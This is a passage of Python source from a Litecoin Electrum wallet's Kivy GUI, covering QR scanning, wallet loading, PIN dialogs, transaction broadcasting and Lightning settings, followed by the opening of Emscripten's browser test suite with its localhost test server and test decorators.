popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(
title, data, show_text,
failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard,
help_text=help_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('electrum_ltc/gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
Window.bind(on_key_down=self.on_key_down)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitcoin: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
util.register_callback(self.on_network_event, interests)
util.register_callback(self.on_fee, ['fee'])
util.register_callback(self.on_fee_histogram, ['fee_histogram'])
util.register_callback(self.on_quotes, ['on_quotes'])
util.register_callback(self.on_history, ['on_history'])
util.register_callback(self.on_channels, ['channels_updated'])
util.register_callback(self.on_channel, ['channel'])
util.register_callback(self.on_invoice_status, ['invoice_status'])
util.register_callback(self.on_request_status, ['request_status'])
util.register_callback(self.on_payment_failed, ['payment_failed'])
util.register_callback(self.on_payment_succeeded, ['payment_succeeded'])
util.register_callback(self.on_channel_db, ['channel_db'])
util.register_callback(self.set_num_peers, ['gossip_peers'])
util.register_callback(self.set_unknown_channels, ['unknown_channels'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def on_channel_db(self, event, num_nodes, num_channels, num_policies):
self.lightning_gossip_num_nodes = num_nodes
self.lightning_gossip_num_channels = num_channels
def set_num_peers(self, event, num_peers):
self.lightning_gossip_num_peers = num_peers
def set_unknown_channels(self, event, unknown):
self.lightning_gossip_num_queries = unknown
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, wizard, storage, db):
if storage:
wallet = Wallet(db, storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
elif not self.wallet:
# wizard did not return a wallet; and there is no wallet open atm
# try to open last saved wallet (potentially start wizard again)
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True),
ask_if_wizard=True)
def _on_decrypted_storage(self, storage: WalletStorage):
assert storage.is_past_initial_decryption()
db = WalletDB(storage.read(), manual_upgrades=False)
if db.requires_upgrade():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.upgrade_storage(storage, db)
else:
self.on_wizard_complete(None, storage, db)
def load_wallet_by_name(self, path, ask_if_wizard=False):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
else:
def launch_wizard():
d = OpenWalletDialog(self, path, self.on_open_wallet)
d.open()
if not ask_if_wizard:
launch_wizard()
else:
def handle_answer(b: bool):
if b:
launch_wizard()
else:
try: os.unlink(path)
except FileNotFoundError: pass
self.stop()
d = Question(_('Do you want to launch the wizard again?'), handle_answer)
d.open()
def on_open_wallet(self, pw, storage):
if not storage.file_exists():
wizard = Factory.InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.bind(on_wizard_complete=self.on_wizard_complete)
wizard.run('new')
else:
try:
storage.decrypt(pw)
except StorageReadWriteError:
app.show_error(_("R/W error accessing path"))
return
self.password = pw
self._on_decrypted_storage(storage)
def on_stop(self):
Logger.info('on_stop')
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def lightning_open_channel_dialog(self):
if not self.wallet.has_lightning():
self.show_error(_('Lightning is not enabled for this wallet'))
return
d = LightningOpenChannelDialog(self)
d.open()
def lightning_channels_dialog(self):
if self._channels_dialog is None:
self._channels_dialog = LightningChannelsDialog(self)
self._channels_dialog.open()
def on_channel(self, evt, wallet, chan):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def on_channels(self, evt, wallet):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def wallets_dialog(self):
from .uix.dialogs.wallets import WalletDialog
dirname = os.path.dirname(self.electrum_config.get_wallet_path())
d = WalletDialog(dirname, self.load_wallet_by_name)
d.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
self.wallets_dialog()
elif name == 'status':
popup = Builder.load_file('electrum_ltc/gui/kivy/uix/ui_screens/'+name+'.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file('electrum_ltc/gui/kivy/uix/ui_screens/'+name+'.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum_ltc.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum_ltc.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_ltc_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_ltc_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.contacts_screen = None
self.send_screen = None
self.invoices_screen = None
self.receive_screen = None
self.requests_screen = None
self.address_screen = None
self.icon = "electrum_ltc/gui/icons/electrum-ltc.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.server.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
Logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
self.electrum_config.save_last_wallet(wallet)
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
l = int(self.wallet.lnworker.get_balance()) if self.wallet.lnworker else 0
text = self.format_amount(c + x + u + l)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(c+u+x) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self):
from electrum_ltc.transaction import PartialTxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.address)
if not addr:
addr = self.wallet.dummy_address()
outputs = [PartialTxOutput.from_address_and_value(addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, decimal_point=self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(
x,
num_zeros=0,
decimal_point=self.decimal_point(),
is_diff=is_diff,
whitespaces=whitespaces,
)
def format_amount_and_units(self, x) -> str:
if x is None:
return 'none'
if x == '!':
return 'max'
return format_satoshis_plain(x, decimal_point=self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000) + ' sat/byte'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Vialectrum', message,
app_icon=icon, app_name='Vialectrum')
except ImportError:
Logger.Error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
now = time.time()
if self.wallet and self.has_pin_code() and now - self.pause_time > 5*60:
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=None,
on_failure=self.stop)
d.open()
if self.nfcscanner:
self.nfcscanner.nfc_enable()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label):
if not label.data:
return
self.qr_dialog(label.name, label.data, True)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon='atlas://electrum_ltc/gui/kivy/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble( text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon='atlas://electrum_ltc/gui/kivy/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
text = str(text) # so that we also handle e.g. Exception
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
if info_bubble.parent:
win.remove_widget(info_bubble
if not info_bubble.modal else
info_bubble._modal_view)
if not arrow_pos:
info_bubble.show_arrow = False
else:
info_bubble.show_arrow = True
info_bubble.arrow_pos = arrow_pos
img = info_bubble.ids.img
if text == 'texture':
# icon holds a texture not a source image
# display the texture in full screen
text = ''
img.texture = icon
info_bubble.fs = True
info_bubble.show_arrow = False
img.allow_stretch = True
info_bubble.dim_background = True
info_bubble.background_image = 'atlas://electrum_ltc/gui/kivy/theming/light/card'
else:
info_bubble.fs = False
info_bubble.icon = icon
#if img.texture and img._coreimage:
# img.reload()
img.allow_stretch = False
info_bubble.dim_background = False
info_bubble.background_image = 'atlas://data/images/defaulttheme/bubble'
info_bubble.message = text
if not pos:
pos = (win.center[0], win.center[1] - (info_bubble.height/2))
info_bubble.show(pos, duration, width, modal=modal, exit=exit)
def tx_dialog(self, tx):
from .uix.dialogs.tx_dialog import TxDialog
d = TxDialog(self, tx)
d.open()
def show_transaction(self, txid):
tx = self.wallet.db.get_transaction(txid)
if not tx and self.wallet.lnworker:
tx = self.wallet.lnworker.lnwatcher.db.get_transaction(txid)
if tx:
self.tx_dialog(tx)
else:
self.show_error(f'Transaction not found {txid}')
def lightning_tx_dialog(self, tx):
from .uix.dialogs.lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx)
d.open()
def sign_tx(self, *args):
threading.Thread(target=self._sign_tx, args=args).start()
def _sign_tx(self, tx, password, on_success, on_failure):
try:
self.wallet.sign_transaction(tx, password)
except InvalidPassword:
Clock.schedule_once(lambda dt: on_failure(_("Invalid PIN")))
return
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
Clock.schedule_once(lambda dt: on_success(tx))
def _broadcast_thread(self, tx, on_complete):
status = False
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
msg = e.get_message_for_gui()
except BestEffortRequestFailed as e:
msg = repr(e)
else:
status, msg = True, tx.txid()
Clock.schedule_once(lambda dt: on_complete(status, msg))
def broadcast(self, tx):
def on_complete(ok, msg):
if ok:
self.show_info(_('Payment sent.'))
if self.send_screen:
self.send_screen.do_clear()
else:
msg = msg or ''
self.show_error(msg)
if self.network and self.network.is_connected():
self.show_info(_('Sending'))
threading.Thread(target=self._broadcast_thread, args=(tx, on_complete)).start()
else:
self.show_info(_('Cannot broadcast transaction') + ':\n' + _('Not connected'))
def description_dialog(self, screen):
from .uix.dialogs.label_dialog import LabelDialog
text = screen.message
def callback(text):
screen.message = text
d = LabelDialog(_('Enter description'), text, callback)
d.open()
def amount_dialog(self, screen, show_max):
from .uix.dialogs.amount_dialog import AmountDialog
amount = screen.amount
if amount:
amount, u = str(amount).split()
assert u == self.base_unit
def cb(amount):
screen.amount = amount
popup = AmountDialog(show_max, amount, cb)
popup.open()
def addresses_dialog(self):
from .uix.dialogs.addresses import AddressesDialog
if self._addresses_dialog is None:
self._addresses_dialog = AddressesDialog(self)
self._addresses_dialog.update()
self._addresses_dialog.open()
def fee_dialog(self, label, dt):
from .uix.dialogs.fee_dialog import FeeDialog
def cb():
self.fee_status = self.electrum_config.get_fee_status()
fee_dialog = FeeDialog(self, self.electrum_config, cb)
fee_dialog.open()
def on_fee(self, event, *arg):
self.fee_status = self.electrum_config.get_fee_status()
def protected(self, msg, f, args):
if self.electrum_config.get('pin_code'):
msg += "\n" + _("Enter your PIN code to proceed")
on_success = lambda pw: f(*args, self.password)
d = PincodeDialog(
self,
message = msg,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=lambda: None)
d.open()
else:
d = Question(
msg,
lambda b: f(*args, self.password) if b else None,
yes_str=_("OK"),
no_str=_("Cancel"),
title=_("Confirm action"))
d.open()
def toggle_lightning(self):
if self.wallet.has_lightning():
if not bool(self.wallet.lnworker.channels):
warning = _('This will delete your lightning private keys')
d = Question(_('Disable Lightning?') + '\n\n' + warning, self._disable_lightning)
d.open()
else:
self.show_info('This wallet has channels')
else:
warning1 = _("Lightning support in Electrum is experimental. Do not put large amounts in lightning channels.")
warning2 = _("Funds stored in lightning channels are not recoverable from your seed. You must backup your wallet file everytime you create a new channel.")
d = Question(_('Enable Lightning?') + '\n\n' + warning1 + '\n\n' + warning2, self._enable_lightning)
d.open()
def _enable_lightning(self, b):
if not b:
return
wallet_path = self.get_wallet_path()
self.wallet.init_lightning()
self.show_info(_('Lightning keys have been initialized.'))
self.stop_wallet()
self.load_wallet_by_name(wallet_path)
def _disable_lightning(self, b):
if not b:
return
wallet_path = self.get_wallet_path()
self.wallet.remove_lightning()
self.show_info(_('Lightning keys have been removed.'))
self.stop_wallet()
self.load_wallet_by_name(wallet_path)
def delete_wallet(self):
basename = os.path.basename(self.wallet.storage.path)
d = Question(_('Delete wallet?') + '\n' + basename, self._delete_wallet)
d.open()
def _delete_wallet(self, b):
if b:
basename = self.wallet.basename()
self.protected(_("Are you sure you want to delete wallet {}?").format(basename),
self.__delete_wallet, ())
def __delete_wallet(self, pw):
wallet_path = self.get_wallet_path()
basename = os.path.basename(wallet_path)
if self.wallet.has_password():
try:
self.wallet.check_password(pw)
except:
self.show_error("Invalid PIN")
return
self.stop_wallet()
os.unlink(wallet_path)
self.show_error(_("Wallet removed: {}").format(basename))
new_path = self.electrum_config.get_wallet_path(use_gui_last_wallet=True)
self.load_wallet_by_name(new_path)
def show_seed(self, label):
self.protected(_("Display your seed?"), self._show_seed, (label,))
def _show_seed(self, label, password):
if self.wallet.has_password() and password is None:
return
keystore = self.wallet.keystore
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
label.data = seed
if passphrase:
label.data += '\n\n' + _('Passphrase') + ': ' + passphrase
def has_pin_code(self):
return bool(self.electrum_config.get('pin_code'))
def check_pin_code(self, pin):
if pin != self.electrum_config.get('pin_code'):
raise InvalidPassword
def change_password(self, cb):
def on_success(old_password, new_password):
self.wallet.update_password(old_password, new_password)
self.password = new_password
self.show_info(_("Your password was updated"))
on_failure = lambda: self.show_error(_("Password not updated"))
d = ChangePasswordDialog(self, self.wallet, on_success, on_failure)
d.open()
def change_pin_code(self, cb):
def on_success(old_password, new_password):
self.electrum_config.set_key('pin_code', new_password)
cb()
self.show_info(_("PIN updated") if new_password else _('PIN disabled'))
on_failure = lambda: self.show_error(_("PIN not updated"))
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=on_failure,
is_change=True,
has_password = self.has_pin_code())
d.open()
def save_backup(self):
if platform != 'android':
self._save_backup()
return
from android.permissions import request_permissions, Permission
def cb(permissions, grant_results: Sequence[bool]):
if not grant_results or not grant_results[0]:
self.show_error(_("Cannot save backup without STORAGE permission"))
return
# note: Clock.schedule_once is a hack so that we get called on a non-daemon thread
# (needed for WalletDB.write)
Clock.schedule_once(lambda dt: self._save_backup())
request_permissions([Permission.WRITE_EXTERNAL_STORAGE], cb)
def _save_backup(self):
new_path = self.wallet.save_backup()
if new_path:
self.show_info(_("Backup saved:") + f"\n{new_path}")
else:
self.show_error(_("Backup NOT saved. Backup directory not configured."))
def export_private_keys(self, pk_label, addr):
if self.wallet.is_watching_only():
self.show_info(_('This is a watching-only wallet. It does not contain private keys.'))
return
def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password))
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Decrypt your private key?"), show_private_key, (addr, pk_label))
def import_channel_backup(self, encrypted):
d = Question(_('Import Channel Backup?'), lambda b: self._import_channel_backup(b, encrypted))
d.open()
def _import_channel_backup(self, b, encrypted):
if not b:
return
try:
self.wallet.lnbackups.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
self.lightning_channels_dialog()
|
test_browser.py
|
# coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import argparse
import json
import multiprocessing
import os
import random
import shlex
import shutil
import subprocess
import time
import unittest
import webbrowser
import zlib
from http.server import BaseHTTPRequestHandler, HTTPServer
from pathlib import Path
from urllib.request import urlopen
from common import BrowserCore, RunnerCore, path_from_root, has_browser, EMTEST_BROWSER, Reporting
from common import create_file, parameterized, ensure_dir, disabled, test_file, WEBIDL_BINDER
from common import read_file, requires_v8, also_with_minimal_runtime
from tools import shared
from tools import ports
from tools.shared import EMCC, WINDOWS, FILE_PACKAGER, PIPE
from tools.shared import try_delete
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
s.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if s.path == '/':
s.sendheaders()
elif not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
def also_with_wasmfs(f):
def metafunc(self, wasmfs, *args, **kwargs):
if wasmfs:
self.set_setting('WASMFS')
self.emcc_args = self.emcc_args.copy() + ['-DWASMFS']
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
metafunc._parameterize = {'': (False,),
'wasmfs': (True,)}
return metafunc
def also_with_wasm2js(f):
assert callable(f)
def metafunc(self, with_wasm2js):
assert self.get_setting('WASM') is None
if with_wasm2js:
self.set_setting('WASM', 0)
f(self)
else:
f(self)
metafunc._parameterize = {'': (False,),
'wasm2js': (True,)}
return metafunc
def shell_with_script(shell_file, output_file, replacement):
shell = read_file(path_from_root('src', shell_file))
create_file(output_file, shell.replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower()
def no_chrome(note='chrome is not supported'):
if is_chrome():
return unittest.skip(note)
return lambda f: f
def is_firefox():
return EMTEST_BROWSER and 'firefox' in EMTEST_BROWSER.lower()
def no_firefox(note='firefox is not supported'):
if is_firefox():
return unittest.skip(note)
return lambda f: f
def no_swiftshader(f):
assert callable(f)
def decorated(self, *args, **kwargs):
if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
self.skipTest('not compatible with swiftshader')
return f(self, *args, **kwargs)
return decorated
def requires_threads(f):
assert callable(f)
def decorated(self, *args, **kwargs):
if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set')
return f(self, *args, **kwargs)
return decorated
def also_with_threads(f):
def decorated(self, *args, **kwargs):
f(self)
if not os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
print('(threads)')
self.emcc_args += ['-pthread']
f(self, *args, **kwargs)
return decorated
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
requires_offscreen_canvas = unittest.skipIf(os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'), "This test requires a browser with OffscreenCanvas")
class browser(BrowserCore):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.browser_timeout = 60
if EMTEST_BROWSER != 'node':
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def setUp(self):
super().setUp()
# avoid various compiler warnings that many browser tests currently generate
self.emcc_args += [
'-Wno-pointer-sign',
'-Wno-int-conversion',
]
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future, remove this test once
# system JS libraries are no longer automatically linked to anymore.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-sUSE_SDL', '-lGL']) # is the default anyhow
def test_sdl1_es6(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-sUSE_SDL', '-lGL', '-sEXPORT_ES6'])
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = 'src.cpp'
html_file = 'src.html'
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
create_file(cpp_file, r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
self.compile_btest(['src.cpp', '-o', 'src.html', '-gsource-map'])
self.assertExists(html_file)
self.assertExists('src.wasm.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step
through and see the print (best to run with --save-dir for the reload).
''')
def test_emscripten_log(self):
self.btest_exit(test_file('emscripten_log/emscripten_log.cpp'),
args=['--pre-js', path_from_root('src/emscripten-source-map.min.js'), '-gsource-map'])
@also_with_wasmfs
def test_preload_file(self):
create_file('somefile.txt', 'load me right before running the code please')
